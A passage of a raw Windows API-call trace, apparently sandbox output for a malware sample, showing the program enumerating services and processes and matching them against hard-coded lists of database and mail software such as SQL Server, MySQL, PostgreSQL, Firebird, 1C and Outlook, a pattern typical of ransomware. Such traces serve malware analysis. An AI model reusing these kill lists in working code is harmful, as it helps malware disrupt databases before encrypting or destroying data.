th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.195] lstrlenW (lpString="svchost.exe") returned 11 [0051.195] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0051.196] CloseHandle (hObject=0x1a0) returned 1 [0051.196] Sleep (dwMilliseconds=0x1f4) [0051.971] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x37203d0 [0051.972] EnumServicesStatusExW (in: hSCManager=0x37203d0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 0 [0051.973] GetLastError () returned 0xea [0051.973] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12c6) returned 0x6e39b0 [0051.973] EnumServicesStatusExW (in: hSCManager=0x37203d0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6e39b0, cbBufSize=0x12c6, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6e39b0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 1 [0051.974] CloseServiceHandle (hSCObject=0x37203d0) returned 1 [0051.974] lstrlenW (lpString="Appinfo") returned 7 [0051.974] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0051.974] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0051.974] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0051.974] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0051.974] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0051.974] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0051.974] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0051.974] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0051.974] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0051.974] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0051.974] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0051.974] lstrlenW (lpString="AudioSrv") returned 8 [0051.974] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0051.974] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0051.974] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0051.974] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0051.974] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0051.974] lstrlenW (lpString="BFE") returned 3 [0051.974] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0051.974] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0051.974] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0051.974] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0051.974] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0051.974] lstrlenW (lpString="CryptSvc") returned 8 [0051.974] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0051.974] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0051.975] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0051.975] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0051.975] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0051.975] lstrlenW (lpString="CscService") returned 10 [0051.975] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0051.975] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0051.975] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0051.975] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0051.975] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0051.975] lstrlenW (lpString="DcomLaunch") returned 10 [0051.975] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0051.975] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0051.975] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0051.975] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0051.975] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0051.975] lstrlenW (lpString="Dhcp") returned 4 [0051.975] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0051.975] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0051.975] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0051.975] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0051.975] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0051.975] lstrlenW (lpString="Dnscache") returned 8 [0051.975] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0051.975] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0051.975] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0051.975] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0051.975] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0051.975] lstrlenW (lpString="DPS") returned 3 [0051.975] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0051.975] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0051.975] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0051.975] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0051.976] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0051.976] lstrlenW (lpString="eventlog") returned 8 [0051.976] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0051.976] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0051.976] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0051.976] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0051.976] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0051.976] lstrlenW (lpString="EventSystem") returned 11 [0051.976] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0051.976] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0051.976] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0051.976] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0051.976] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0051.976] lstrlenW (lpString="gpsvc") returned 5 [0051.976] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0051.976] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0051.976] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0051.976] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0051.976] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0051.976] lstrlenW (lpString="iphlpsvc") returned 8 [0051.976] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0051.976] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0051.976] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0051.976] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0051.976] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0051.976] lstrlenW (lpString="LanmanServer") returned 12 [0051.976] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0051.976] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0051.976] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0051.976] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0051.976] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0051.976] lstrlenW (lpString="LanmanWorkstation") returned 17 [0051.976] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0051.976] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0051.977] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0051.977] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0051.977] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0051.977] lstrlenW (lpString="lmhosts") returned 7 [0051.977] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0051.977] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0051.977] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0051.977] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0051.977] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0051.977] lstrlenW (lpString="MMCSS") returned 5 [0051.977] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0051.977] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0051.977] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0051.977] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0051.977] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0051.977] lstrlenW (lpString="MpsSvc") returned 6 [0051.977] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0051.977] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0051.977] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0051.977] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0051.977] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0051.977] lstrlenW (lpString="Netman") returned 6 [0051.977] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0051.977] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0051.977] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0051.977] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0051.977] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0051.977] lstrlenW (lpString="netprofm") returned 8 [0051.978] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0051.978] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0051.978] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0051.978] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0051.978] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0051.978] lstrlenW (lpString="NlaSvc") returned 6 [0051.978] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0051.978] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0051.978] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0051.978] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0051.978] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0051.978] lstrlenW (lpString="nsi") returned 3 [0051.978] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0051.978] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0051.978] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0051.978] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0051.978] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0051.978] lstrlenW (lpString="PcaSvc") returned 6 [0051.978] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0051.978] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0051.978] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0051.978] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0051.978] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0051.978] lstrlenW (lpString="PlugPlay") returned 8 [0051.978] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0051.978] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0051.978] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0051.978] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0051.978] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0051.978] lstrlenW (lpString="Power") returned 5 [0051.978] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0051.978] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0051.978] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0051.978] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0051.979] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0051.979] lstrlenW (lpString="ProfSvc") returned 7 [0051.979] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0051.979] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0051.979] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0051.979] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0051.979] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0051.979] lstrlenW (lpString="RpcEptMapper") returned 12 [0051.979] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0051.979] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0051.979] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0051.979] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0051.979] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0051.979] lstrlenW (lpString="RpcSs") returned 5 [0051.979] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0051.979] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0051.979] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0051.979] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0051.979] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0051.979] lstrlenW (lpString="SamSs") returned 5 [0051.979] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0051.979] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0051.979] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0051.979] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0051.979] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0051.979] lstrlenW (lpString="Schedule") returned 8 [0051.979] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0051.979] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0051.979] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0051.979] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0051.979] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0051.979] lstrlenW (lpString="SENS") returned 4 [0051.980] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0051.980] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0051.980] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0051.980] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0051.980] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0051.980] lstrlenW (lpString="ShellHWDetection") returned 16 [0051.980] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0051.980] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0051.980] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0051.980] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0051.980] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0051.980] lstrlenW (lpString="Spooler") returned 7 [0051.980] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0051.980] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0051.980] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0051.980] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0051.980] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0051.980] lstrlenW (lpString="swprv") returned 5 [0051.980] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0051.980] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0051.980] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0051.980] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0051.980] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0051.980] lstrlenW (lpString="SysMain") returned 7 [0051.980] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0051.980] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0051.980] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0051.980] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0051.980] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0051.980] lstrlenW (lpString="Themes") returned 6 [0051.980] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0051.980] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0051.980] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0051.980] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0051.981] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0051.981] lstrlenW (lpString="TrkWks") returned 6 [0051.981] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0051.981] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0051.981] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0051.981] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0051.981] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0051.981] lstrlenW (lpString="UxSms") returned 5 [0051.981] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0051.981] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0051.981] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0051.981] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0051.981] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0051.981] lstrlenW (lpString="VSS") returned 3 [0051.981] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0051.981] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0051.981] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0051.981] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0051.981] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0051.981] lstrlenW (lpString="WdiServiceHost") returned 14 [0051.981] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0051.981] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0051.981] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0051.981] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0051.981] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0051.981] lstrlenW (lpString="WdiSystemHost") returned 13 [0051.981] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0051.981] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0051.981] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0051.981] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0051.981] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0051.981] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0051.981] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0051.982] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0051.982] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0051.982] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0051.982] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0051.982] lstrlenW (lpString="Winmgmt") returned 7 [0051.982] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0051.982] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0051.982] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0051.982] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0051.982] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0051.982] lstrlenW (lpString="WPDBusEnum") returned 10 [0051.982] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0051.982] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0051.982] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0051.982] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0051.982] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0051.982] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6e39b0 | out: hHeap=0x5f0000) returned 1 [0051.982] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a0 [0051.985] Process32FirstW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0051.985] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0051.986] lstrlenW (lpString="System") returned 6 [0051.986] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0051.986] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0051.986] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0051.986] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0051.986] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0051.986] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0051.986] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0051.986] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0051.987] lstrlenW (lpString="smss.exe") returned 8 [0051.987] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0051.987] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0051.987] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0051.987] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0051.987] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0051.987] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0051.987] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0051.987] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0051.988] lstrlenW (lpString="csrss.exe") returned 9 [0051.988] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0051.988] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0051.988] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0051.988] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0051.988] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0051.988] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0051.988] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0051.988] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0051.989] lstrlenW (lpString="wininit.exe") returned 11 [0051.989] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0051.989] 